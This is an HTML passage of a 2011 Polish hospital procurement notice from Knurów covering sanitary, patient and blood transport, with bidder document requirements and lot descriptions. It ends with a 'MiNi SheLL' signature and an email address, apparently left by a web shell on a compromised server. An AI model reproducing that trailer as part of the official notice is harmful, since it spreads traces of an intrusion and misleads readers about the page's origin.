<ul class="kh_indent_1"><li><p>na potwierdzenie tego warunku Wykonawcy załączy do oferty oświadczenie, o którym mowa w pkt. 8.1a tj. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) - Załącznik Nr 3 - w przypadku składania oferty wspólnej do złożenia w/w dokumentu zobowiązany jest pełnomocnik oraz dokument o którym mowa w pkt. 8.1d SIWZ tj.Opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
Zamawiający wymaga wykazania się posiadaniem przez Wykonawcę (Wykonawców występujących wspólnie) opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż: wyrażona w złotych równowartość kwoty 46500 euro na jedno zdarzenie i 275 000 euro na wszystkie zdarzenia, których skutki objęte są umową ubezpieczenia OC ustalonej przy zastosowaniu kursu średniego euro ogłoszonego przez Narodowy Bank Polski po raz pierwszy w roku, w którym umowa ubezpieczenia OC została zawarta zgodnie z Rozporządzeniem Ministra Finansów z dnia 28 grudnia 2007r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej świadczeniodawcy udzielającego świadczeń opieki zdrowotnej. (Dz. U. z 2008, Nr 3, poz. 10). Do oferty należy dołączyć dowód opłacenia polisy.
Dokumenty będą oceniane w trybie spełnia/nie spełnia, czyli nie spełnia warunku - za brak dokumentu lub oświadczenia, spełnia warunek - za przedstawienie ważnego dokumentu lub oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego - wymagane dokumenty

a) postanowienie właściwego inspektora sanitarnego potwierdzające, że pomieszczenia i urządzenia Wykonawcy spełniają wymagania określone w Rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2011r. w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. Nr 31 z 2011r., poz. 158)
b) dokument potwierdzający spełnianie przez środki transportu sanitarnego wymagań Polskiej Normy PN-EN 1789 Pojazdy mechaniczne i ich wyposażenie - ambulanse drogowe (certyfikat lub dokument potwierdzający spełnianie wymogów normy wydane przez podmiot uprawniony do oceny pojazdów w tym zakresie)
c) oświadczenie Wykonawcy Załącznik nr 9
d) Aktualny wpis do rejestru zakładów opieki zdrowotnej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane przez Zamawiającego dokumenty, jakie należy załączyć do oferty

a)	Formularz ofertowy Załącznik Nr 1 - wypełniony, podpisany przez Wykonawcę;
b)	Oświadczenie Wykonawcy o akceptacji Wzoru umowy (Załącznik nr 2) - Wykonawca składa na Załączniku nr 1 Formularz ofertowy; 
c)	Oświadczenie Wykonawcy zawierające wskazanie przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom - Wykonawca składa na Załączniku nr 1 Formularz ofertowy; 
d)	W przypadku spółki cywilnej - umowa spółki cywilnej.
e)	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy  wymagają zgłoszenia do ewidencji działalności gospodarczej.
f)	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba, że zmiana dotyczy w Części IV ceny: 
a) Wynagrodzenia może być zmienione nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy i może wzrosnąć o wskaźnik wzrostu cen towarów i usług konsumpcyjnych opublikowanym w Monitorze Polskim przez Prezesa GUS, co stanowi odpowiednią zmianę niniejszej umowy bez potrzeby uprzedniego jej wypowiedzenia i zawierania nowej umowy lub w przypadku wzrostu cen paliwa, podatku od środków transportu, taryf ubezpieczeniowych itp. nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalknurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Niepodległości 8, 44-190 Knurów, pokój nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2011 godzina 11:00, miejsce: ul. Niepodległości 8, 44-190 Knurów, pokój nr 24.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Transport krwi i materiału biologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie całodobowych usług transportu sanitarnego, obejmujące zapewnienie całodobowej gotowości zespołu, realizowanie wezwań i udzielanie usług w zakresie transportu sanitarnego zgodnie z zapotrzebowaniem siedem dni w tygodniu w tym święta i dni ustawowo wolne od pracy w zakresie transportu krwi i materiału biologicznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transport sanitarny pacjentów bez opieki medycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie całodobowych usług transportu sanitarnego, obejmujące zapewnienie całodobowej gotowości zespołu, realizowanie wezwań i udzielanie usług w zakresie transportu sanitarnego zgodnie z zapotrzebowaniem siedem dni w tygodniu w tym święta i dni ustawowo wolne od pracy w zakresie transportu sanitarnego pacjentów bez opieki medycznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Transport sanitarny pacjentów z opieką medyczną - sanitariusz/ratownik medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie całodobowych usług transportu sanitarnego, obejmujące zapewnienie całodobowej gotowości zespołu, realizowanie wezwań i udzielanie usług w zakresie transportu sanitarnego zgodnie z zapotrzebowaniem siedem dni w tygodniu w tym święta i dni ustawowo wolne od pracy w zakresie transportu sanitarnego pacjentów z opieką medyczną - sanitariusz/ratownik medyczny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Transport sanitarny pacjentów z opieką medyczną - zespół specjalistyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie całodobowych usług transportu sanitarnego, obejmujące zapewnienie całodobowej gotowości zespołu, realizowanie wezwań i udzielanie usług w zakresie transportu sanitarnego zgodnie z zapotrzebowaniem siedem dni w tygodniu w tym święta i dni ustawowo wolne od pracy w zakresie transportu sanitarnego pacjentów z opieką medyczną - zespół specjalistyczny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com